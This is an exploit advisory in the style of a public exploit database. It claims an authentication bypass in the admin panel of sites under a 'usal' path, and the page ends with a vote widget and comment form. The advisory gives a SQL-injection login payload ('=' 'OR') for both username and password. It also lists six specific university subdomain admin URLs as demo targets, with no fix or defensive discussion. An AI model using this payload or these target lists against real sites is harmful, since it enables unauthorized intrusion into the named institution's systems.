Usal - Admin panel Authentication bypass

2017.11.20

Reza Li (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

____________________________________________________________________
# Exploit Title: --- Usal - Admin panel Authentication bypass ---
____________________________________________________________________
#
#
#
#
#
# Google Dork: whatever :)
# Date: 2017-11-20
#
# Exploit Author: => Reza Li
#
# Telegram = N4tw0rk
#
#
###################################################################
# Description:Any Site that has this perfix is Hacked (Usal)
#
#
# Example : http://site.es/~deportes/admin/index.php
#
#
#
# Enter Username and Password : '=' 'OR'
#
#
#
# Demo = http://munusal.usal.es/~deportes/admin/index.php
# http://masterenhistoria.usal.es/~deportes/admin/index.php
# http://buengobierno.usal.es/~deportes/admin/index.php
# http://control.usal.es/~deportes/admin/index.php
# http://revistas.usal.es/~deportes/admin/index.php
# http://ticedu.usal.es/~deportes/admin/index.php
#
#
#
#
###################################################################
#
# Category: Webapps
# Version: All Version
# Tested on: Windows10
# Language: PHP
#
________________________________________________________
| Discovered By : Reza Li |
;)
My Friend =====> Ali Afee
Telegram = N4tw0rk
________________________________________________________

See this note in RAW Version

Vote for this issue:

100%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Usal - Admin panel Authentication bypass

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.